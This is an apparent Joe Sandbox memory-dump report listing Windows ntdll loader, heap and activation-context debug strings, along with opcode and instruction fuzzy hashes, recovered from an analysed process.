                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01972180
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                APIs
                                                  • Part of subcall function 01942DF0: LdrInitializeThunk.NTDLL ref: 01942DFA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940BA3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940BB6
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940D60
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940D74
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                • String ID:
                                                • API String ID: 1404860816-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                Strings
                                                • LdrpInitializeProcess, xrefs: 01938422
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01938421
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0193855E
                                                • @, xrefs: 01938591
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                Strings
                                                • SXS: %s() passed the empty activation context, xrefs: 019721DE
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019722B6
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019721D9, 019722B1
                                                • .Local, xrefs: 019328D8
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                Strings
                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0197342A
                                                • RtlDeactivateActivationContext, xrefs: 01973425, 01973432, 01973451
                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01973456
                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01973437
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                • API String ID: 0-1245972979
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0196106B
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019610AE
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01961028
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01960FE5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                Strings
                                                • LdrpDynamicShimModule, xrefs: 0196A998
                                                • apphelp.dll, xrefs: 01922462
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0196A9A2
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0196A992
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 01913255
                                                • HEAP: , xrefs: 01913264
                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0191327D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                • API String ID: 0-617086771
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $@
                                                • API String ID: 0-1077428164
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                Strings
                                                • Failed to allocated memory for shimmed module list, xrefs: 0196A10F
                                                • LdrpCheckModule, xrefs: 0196A117
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0196A121
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-161242083
                                                Strings
                                                • Failed to reallocate the system dirs string !, xrefs: 019782D7
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 019782DE
                                                • minkernel\ntdll\ldrinit.c, xrefs: 019782E8
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                Strings
                                                • PreferredUILanguages, xrefs: 019BC212
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019BC1C5
                                                • @, xrefs: 019BC1F1
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                Strings
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01984888
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01984899
                                                • LdrpCheckRedirection, xrefs: 0198488F
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                Strings
                                                • Process initialization failed with status 0x%08lx, xrefs: 019820F3
                                                • LdrpInitializationFailure, xrefs: 019820FA
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01982104
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                Strings
                                                • LdrResSearchResource Enter, xrefs: 0190AA13
                                                • LdrResSearchResource Exit, xrefs: 0190AA25
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                • API String ID: 0-4066393604
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                Similarity
                                                • API ID:
                                                • String ID: @$MUI
                                                • API String ID: 0-17815947
                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0190063D
                                                • kLsE, xrefs: 01900540
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                Strings
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0190A2FB
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0190A309
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                Similarity
                                                • API ID:
                                                • String ID: .mui
                                                • API String ID: 0-1199573805
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                Strings
                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0198895E
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                • API String ID: 0-702105204
                                                • Instruction Fuzzy Hash: CE32F070A007598FDB25CF69C944BBEBBFABF84704F24451DD48E9B284D735A841CBA1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a991b0ca27a02e44a3dd62ebcce21d015f0fb117d635ac54111efeed06eede1
                                                • Instruction ID: 223a1d0185d739d4f7228ffc878211eccc46e2a6e59400574726925dfc9316a9
                                                • Opcode Fuzzy Hash: 7a991b0ca27a02e44a3dd62ebcce21d015f0fb117d635ac54111efeed06eede1
                                                • Instruction Fuzzy Hash: AA22D1706046618FEB25CF2DC094776BBF5BF44301F888859E98E8F286D735E45ACBA4
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e13939372674ad125fbc4038089ba81732d34c45b5d022cee5d8921dad34c759
                                                • Instruction ID: e7149514021c9867b6cb26cf75aa0d6f89ecd89a445be92ffb2ae1a55c172ed0
                                                • Opcode Fuzzy Hash: e13939372674ad125fbc4038089ba81732d34c45b5d022cee5d8921dad34c759
                                                • Instruction Fuzzy Hash: C632A171A04615CFDB26CF68C480BAEB7F9FF88310F148569E95AAB391D734E851CB60
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction ID: 3b0ccaaf7ded2fb630e0b7e30f1eef9d057771a784a6c93c3ec7dabdef65bdb9
                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction Fuzzy Hash: 27F16271E0022A9BDB15CF99C590BEEBBF9BF44711F058129E909EB348E774E841CB60
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b4cd1ffe903e39dc0e4d4003a9c39c8dae2e8dd6fa9caf92c333e3e913ca39b
                                                • Instruction ID: 8d6fa5798803edf612eb0eceed2aab99220f63a3622fa1ea07522510c2e6947a
                                                • Opcode Fuzzy Hash: 8b4cd1ffe903e39dc0e4d4003a9c39c8dae2e8dd6fa9caf92c333e3e913ca39b
                                                • Instruction Fuzzy Hash: 64D10F71E0060E9BDF05CF6DC841ABEBBF5AF89305F18816ED859A7241E739E9018B60
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0dfd11790ad4e86c006c6a53f28fe56813c637d587cfde3f173444c00002c05e
                                                • Instruction ID: 2a0c913f0cc6ed07f5a5b7a1145acae307a8cb6ffcc3d6b08cd978372d72def8
                                                • Opcode Fuzzy Hash: 0dfd11790ad4e86c006c6a53f28fe56813c637d587cfde3f173444c00002c05e
                                                • Instruction Fuzzy Hash: D8E1AF71608342CFC716CF2CC480A6ABBE4FF89314F05896DE99987391EB31E955CB92
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c69261a26bb13b43a659332de5ea490bd7df0fc62759448ae24a26b4f92abb59
                                                • Instruction ID: 11ed7864999d8ee99c489e7a3653dde93dc7e545a6558a25cb88f635b472c1fc
                                                • Opcode Fuzzy Hash: c69261a26bb13b43a659332de5ea490bd7df0fc62759448ae24a26b4f92abb59
                                                • Instruction Fuzzy Hash: B3D1F471A0020ADBDB14DF68C890BBE77A5FF55318F04462DEE1AEB280E734DA51CB60
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction ID: 1bf78f2b22d4fb08ff6a14cfb9f36221c45ebe80e3c397f25518bc4f0caea169
                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction Fuzzy Hash: 5FB18775A00609AFDF24EF59C940EABBBB9FF84344F50445DAA0697791DA34E905CB20
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                • Instruction ID: 3f7ff5b897c889ff786a2bcbbd15aa47b6504ab2ef0bd2a0f902ec99473c8375
                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                • Instruction Fuzzy Hash: F1B1193160064A9FDB16CBA8C850BBEBBFAAF84300F180555E65ED7285D731EDC1CB90
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4519905d0ff6f85c52777b1de4fe0064d81cd55f3c435a378c5ce31cd92d344
                                                • Instruction ID: be2203b97307540b5fabfddb521904dec5976e04a537505b215f9520eb757e91
                                                • Opcode Fuzzy Hash: b4519905d0ff6f85c52777b1de4fe0064d81cd55f3c435a378c5ce31cd92d344
                                                • Instruction Fuzzy Hash: DEC158706083418FD765CF19C494BABB7E9BF88304F44496DE98987291E775E908CFA2
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 26703024d8b3044ec287309732436d4110ae94fbd7493f6df53c6e96b8deb525
                                                • Instruction ID: 050312bd6aa122f45dfc29e8870082d0c5edd9cedada8988610b28ee60079ff5
                                                • Opcode Fuzzy Hash: 26703024d8b3044ec287309732436d4110ae94fbd7493f6df53c6e96b8deb525
                                                • Instruction Fuzzy Hash: 67B17370A002698BDB64CF68C890BA9B7B5FF48704F0485EDD64EE7241EB749F85CB25
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d474d8717e629e1fd3404fc35ff691003a01d14d2fe21243779886703863c07
                                                • Instruction ID: c6771d523b5191d41465519cd4cf13372bd0f2416a7e14525a9bccb7d18cfc51
                                                • Opcode Fuzzy Hash: 9d474d8717e629e1fd3404fc35ff691003a01d14d2fe21243779886703863c07
                                                • Instruction Fuzzy Hash: 39A13931E00629AFEB31DB58D894FADBBBCBF40714F050125EA08AB284D7789D40CBE1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79ca17da7cce2e229c1dcf54700acbaeaaf81f49dda482481f5160ccff2495e6
                                                • Instruction ID: 58803c37652bdf3e6b46b29ea9604c36d202a24f0092d2446c179d7b818858d7
                                                • Opcode Fuzzy Hash: 79ca17da7cce2e229c1dcf54700acbaeaaf81f49dda482481f5160ccff2495e6
                                                • Instruction Fuzzy Hash: B0A1E371B006169FDB25CF69C890FAAB7B5FF54719F084129EB0D97281EB34E811CB90
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93dad1f05e0894ef24fba5071f89ce20e0aa23de6c07e77346a2619e18457978
                                                • Instruction ID: 8f361155358df008ad871bc1218778114fc01c20fd5d4bd75f32be71e961f728
                                                • Opcode Fuzzy Hash: 93dad1f05e0894ef24fba5071f89ce20e0aa23de6c07e77346a2619e18457978
                                                • Instruction Fuzzy Hash: 0BA1DD72A04612EFC712DF18C980F1ABBE9FF98744F55892CE58D9BA50D334E940CB92
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                • Instruction ID: 50dd48e1e24c483670777ed805c3a68e7301469c058abf6e3698929238220c7b
                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                • Instruction Fuzzy Hash: DAB12C71E0061ADFDF15CFA9C880AADBBB5FF88311F14C169E919AB354D730A941CBA0
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4961a950c058d925bde215263237c9caf446b0238fbf0f15edcbeeb5e28a731
                                                • Instruction ID: 4e6e528ce21cc30eca0f421f1647a1625cced3d957fe801ca3419cf78eb10395
                                                • Opcode Fuzzy Hash: b4961a950c058d925bde215263237c9caf446b0238fbf0f15edcbeeb5e28a731
                                                • Instruction Fuzzy Hash: 8D91A271D0021AAFDB15DFA8D884BAEBFB9AF49710F154169E618EF351D734E9008BA0
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b303fc20ae22e0ef15fb9513070a2d388208a93be8f9e07fc72ee5d05eaedcfa
                                                • Instruction ID: cfd77a8693702a7daeaf69a5f8ca63acbec6d7ee082f2f2fd1c9b0238dcc50f4
                                                • Opcode Fuzzy Hash: b303fc20ae22e0ef15fb9513070a2d388208a93be8f9e07fc72ee5d05eaedcfa
                                                • Instruction Fuzzy Hash: D0915631A0061ADFEB26DB58C480B7DBBB9EF84B15F144469ED0D9B388E634DD81C761
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 025b0826c0af28672699ab4a428d9851b38ca92c48f286e147e2084a42bc0867
                                                • Instruction ID: c8f0e6d8166308dd93146dcfe7014fd74a3a39ab1deec117f372ba6eeee287f9
                                                • Opcode Fuzzy Hash: 025b0826c0af28672699ab4a428d9851b38ca92c48f286e147e2084a42bc0867
                                                • Instruction Fuzzy Hash: 5B81B571E0061A9FDB59CF69D840ABEBBF9FB48700F44852EE949E7640E734D940CBA4
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                • Instruction ID: 0a898fc328ac2f2477741709bc7f2a3357641453cd0a1252b0a79f3ae78b3718
                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                • Instruction Fuzzy Hash: 90819431A0020A9FDF19CF99C880AAEBBF6FF84710F14856DD9599B344E734EA01CB51
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57cdd53a04e44495d5fd56deecc54072bb51bf7b74947ed663dee3408d8e4f40
                                                • Instruction ID: eca873c35ddac2b3ef29501c90d42a7de09c6bdbefb39c8dd5682a49789f44e1
                                                • Opcode Fuzzy Hash: 57cdd53a04e44495d5fd56deecc54072bb51bf7b74947ed663dee3408d8e4f40
                                                • Instruction Fuzzy Hash: 3B812F71A00609AFDB26DFA9C880FEEBBF9FF88354F144429E559A7250D730AD45CB60
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16102c3b480434fe98c8906c2fa4be5c212f71fb88738100f62010844d2f26d6
                                                • Instruction ID: 437e34bc5c373d591419143303466e83c295a16ea9f7a128a55ab5157114001f
